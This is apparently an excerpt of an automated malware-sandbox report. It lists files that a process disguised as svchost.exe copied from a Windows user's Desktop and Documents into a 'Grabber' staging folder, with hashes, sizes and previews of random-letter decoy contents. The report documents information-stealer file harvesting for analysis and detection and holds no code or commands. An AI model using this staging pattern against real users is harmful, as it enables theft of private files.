                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):282
                                                  Entropy (8bit):3.514693737970008
                                                  Encrypted:false
                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
                                                  MD5:9E36CC3537EE9EE1E3B10FA4E761045B
                                                  SHA1:7726F55012E1E26CC762C9982E7C6C54CA7BB303
                                                  SHA-256:4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
                                                  SHA-512:5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:false
                                                  Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.690299109915258
                                                  Encrypted:false
                                                  SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                  MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                  SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                  SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                  SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                  Malicious:false
                                                  Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG\BJZFPPWAPT.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:false
                                                  Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG\EEGWXUHVUG.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.690299109915258
                                                  Encrypted:false
                                                  SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                  MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                  SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                  SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                  SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                  Malicious:false
                                                  Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG\EFOYFBOLXA.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG\GRXZDKKVDB.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
